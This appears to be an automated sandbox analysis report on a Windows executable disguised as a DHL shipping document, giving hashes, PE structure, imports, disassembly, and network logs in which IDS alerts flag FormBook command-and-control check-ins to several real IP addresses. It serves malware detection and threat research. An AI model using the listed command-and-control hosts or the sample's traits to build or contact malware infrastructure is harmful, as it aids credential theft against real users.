                                                                                      Preview:{l.c.0YBD...9.....11..lHF...BW66Q120YBDKN90XBW66Q120YBDKN9.XBW8).?2.P.e.Ou.y.?_EqA@_>0%&nZQ6,8B.3T.B,,d" .t..w[Y5T.=TH`KN90XBWO7X..P>.y+)..8%.,....P>.^....8%.,....P>.."-Q.8%.66Q120YB..N9|YCW.^.n20YBDKN9.X@V=7Z12 ]BDKN90XBW.#Q12 YBDkJ90X.W6&Q122YBBKN90XBW06Q120YBDkJ90ZBW66Q100..DK^90HBW66A12 YBDKN9 XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW.B4IF0YB.DJ90HBW6&U12 YBDKN90XBW66Q1.0Y"DKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YB

                                                                                      C:\Users\user\AppData\Local\Temp\piceworth

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\DHL 30312052024.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):270848
                                                                                      Entropy (8bit):7.993413433199171
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:fsoRQt12GWUqr1E4tECDm4tm//ugAZwGtS2uw8KWz3nict:fHuQDGCD7E/iDuwpeht
                                                                                      MD5:F7AC0B63E89E78C46408AAA010A6B30C
                                                                                      SHA1:AC3B177598BFF46B4276D436BABB86B79F18439A
                                                                                      SHA-256:16E2B22C2B9BA7E8CD830704110E4AE782989C1357C857BD690B27C949D502E3
                                                                                      SHA-512:0E4CB286A662737D30B090C689D522FF2975E7FDCBE6AAD6DDCCE5B6AFAEA9661DD2263151A95375EB0C08424CE25BF86C1BE68B9617D6ABC7F78B15D0EA4219
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{l.c.0YBD...9.....11..lHF...BW66Q120YBDKN90XBW66Q120YBDKN9.XBW8).?2.P.e.Ou.y.?_EqA@_>0%&nZQ6,8B.3T.B,,d" .t..w[Y5T.=TH`KN90XBWO7X..P>.y+)..8%.,....P>.^....8%.,....P>.."-Q.8%.66Q120YB..N9|YCW.^.n20YBDKN9.X@V=7Z12 ]BDKN90XBW.#Q12 YBDkJ90X.W6&Q122YBBKN90XBW06Q120YBDkJ90ZBW66Q100..DK^90HBW66A12 YBDKN9 XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW.B4IF0YB.DJ90HBW6&U12 YBDKN90XBW66Q1.0Y"DKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YB

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.189598107604616
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:DHL 30312052024.exe
                                                                                      File size:1'208'832 bytes
                                                                                      MD5:e414a371a1be9843ba41ad3b33b1d734
                                                                                      SHA1:9cea807095b000923036736217baabec3af1755e
                                                                                      SHA256:80f9730a0f5124c24863e93b5e6b1b3dc653cc68c12055d9d7309fa636626ae8
                                                                                      SHA512:a3ba878a28891aadcadbb584e26334d97b202f64b0ef399710c30cc61a4eddede67cd9d0af26d0ecd41ed1c33f935850b3b11a9419c7fce6b81c36dcfb2a2918
                                                                                      SSDEEP:24576:eu6J33O0c+JY5UZ+XC0kGso6Fa/93gdmlbQbGROp2ezkmWY:wu0c++OCvkGs9Fa/J6EoGRnY
                                                                                      TLSH:4445BE22B3DDC361CB669173BF69B7016EBF38710630B95B2F880D7DA950162162D7A3
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                      File Icon

                                                                                      Icon Hash:aaf3e3e3938382a0

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x427dcd
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6752434F [Fri Dec 6 00:20:31 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      call 00007FF930F25F3Ah
                                                                                      jmp 00007FF930F18D04h
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push edi
                                                                                      push esi
                                                                                      mov esi, dword ptr [esp+10h]
                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                      mov eax, ecx
                                                                                      mov edx, ecx
                                                                                      add eax, esi
                                                                                      cmp edi, esi
                                                                                      jbe 00007FF930F18E8Ah
                                                                                      cmp edi, eax
                                                                                      jc 00007FF930F191EEh
                                                                                      bt dword ptr [004C31FCh], 01h
                                                                                      jnc 00007FF930F18E89h
                                                                                      rep movsb
                                                                                      jmp 00007FF930F1919Ch
                                                                                      cmp ecx, 00000080h
                                                                                      jc 00007FF930F19054h
                                                                                      mov eax, edi
                                                                                      xor eax, esi
                                                                                      test eax, 0000000Fh
                                                                                      jne 00007FF930F18E90h
                                                                                      bt dword ptr [004BE324h], 01h
                                                                                      jc 00007FF930F19360h
                                                                                      bt dword ptr [004C31FCh], 00000000h
                                                                                      jnc 00007FF930F1902Dh
                                                                                      test edi, 00000003h
                                                                                      jne 00007FF930F1903Eh
                                                                                      test esi, 00000003h
                                                                                      jne 00007FF930F1901Dh
                                                                                      bt edi, 02h
                                                                                      jnc 00007FF930F18E8Fh
                                                                                      mov eax, dword ptr [esi]
                                                                                      sub ecx, 04h
                                                                                      lea esi, dword ptr [esi+04h]
                                                                                      mov dword ptr [edi], eax
                                                                                      lea edi, dword ptr [edi+04h]
                                                                                      bt edi, 03h
                                                                                      jnc 00007FF930F18E93h
                                                                                      movq xmm1, qword ptr [esi]
                                                                                      sub ecx, 08h
                                                                                      lea esi, dword ptr [esi+08h]
                                                                                      movq qword ptr [edi], xmm1
                                                                                      lea edi, dword ptr [edi+08h]
                                                                                      test esi, 00000007h
                                                                                      je 00007FF930F18EE5h
                                                                                      bt esi, 03h
                                                                                      jnc 00007FF930F18F38h

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [ASM] VS2013 build 21005
                                                                                      • [ C ] VS2013 build 21005
                                                                                      • [C++] VS2013 build 21005
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2013 UPD4 build 31101
                                                                                      • [RES] VS2013 build 21005
                                                                                      • [LNK] VS2013 UPD4 build 31101

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5e90c.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1260000x711c.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0xc70000x5e90c0x5ea00464fdbad9ff9b491432e22823af1e342False0.9306060105680317data7.899761227804893IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x1260000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                      RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                      RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                      RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                      RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                      RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                      RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                      RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                      RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                      RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                      RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                      RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                      RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                      RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                      RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                      RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                      RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                      RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                      RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                      RT_RCDATA0xcf7b80x55bd1data1.000330310235346
                                                                                      RT_GROUP_ICON0x12538c0x76dataEnglishGreat Britain0.6610169491525424
                                                                                      RT_GROUP_ICON0x1254040x14dataEnglishGreat Britain1.25
                                                                                      RT_GROUP_ICON0x1254180x14dataEnglishGreat Britain1.15
                                                                                      RT_GROUP_ICON0x12542c0x14dataEnglishGreat Britain1.25
                                                                                      RT_VERSION0x1254400xdcdataEnglishGreat Britain0.6181818181818182
                                                                                      RT_MANIFEST0x12551c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                      Imports

                                                                                      DLLImport
                                                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                      UxTheme.dllIsThemeActive
                                                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishGreat Britain

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-06T17:43:39.116072+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949782154.215.72.11080TCP
                                                                                      2024-12-06T17:44:13.060877+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949865116.50.37.24480TCP
                                                                                      2024-12-06T17:45:36.259355+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.94992185.159.66.9380TCP
                                                                                      2024-12-06T17:45:51.066808+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.94998691.195.240.9480TCP
                                                                                      2024-12-06T17:46:14.625193+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.94999066.29.149.4680TCP
                                                                                      2024-12-06T17:46:30.078407+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949994195.110.124.13380TCP
                                                                                      2024-12-06T17:47:01.525322+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949998217.196.55.20280TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 6, 2024 17:43:37.481515884 CET4978280192.168.2.9154.215.72.110
                                                                                      Dec 6, 2024 17:43:37.601391077 CET8049782154.215.72.110192.168.2.9
                                                                                      Dec 6, 2024 17:43:37.603389978 CET4978280192.168.2.9154.215.72.110
                                                                                      Dec 6, 2024 17:43:37.605808973 CET4978280192.168.2.9154.215.72.110
                                                                                      Dec 6, 2024 17:43:37.725711107 CET8049782154.215.72.110192.168.2.9
                                                                                      Dec 6, 2024 17:43:39.115890980 CET8049782154.215.72.110192.168.2.9
                                                                                      Dec 6, 2024 17:43:39.115932941 CET8049782154.215.72.110192.168.2.9
                                                                                      Dec 6, 2024 17:43:39.116071939 CET4978280192.168.2.9154.215.72.110
                                                                                      Dec 6, 2024 17:43:39.119153023 CET4978280192.168.2.9154.215.72.110
                                                                                      Dec 6, 2024 17:43:39.239156961 CET8049782154.215.72.110192.168.2.9
                                                                                      Dec 6, 2024 17:44:03.445017099 CET4984480192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:03.564943075 CET8049844116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:03.565049887 CET4984480192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:03.566926003 CET4984480192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:03.687235117 CET8049844116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:05.082843065 CET4984480192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:05.090445995 CET8049844116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:05.090570927 CET4984480192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:05.090753078 CET8049844116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:05.090817928 CET4984480192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:05.202996016 CET8049844116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:05.203485012 CET4984480192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:06.101829052 CET4985080192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:06.223057985 CET8049850116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:06.223157883 CET4985080192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:06.225018024 CET4985080192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:06.345778942 CET8049850116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:07.739015102 CET4985080192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:07.748866081 CET8049850116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:07.748970985 CET4985080192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:07.749399900 CET8049850116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:07.749473095 CET4985080192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:07.858964920 CET8049850116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:07.859169006 CET4985080192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:08.757430077 CET4985680192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:08.877233982 CET8049856116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:08.877599955 CET4985680192.168.2.9116.50.37.244
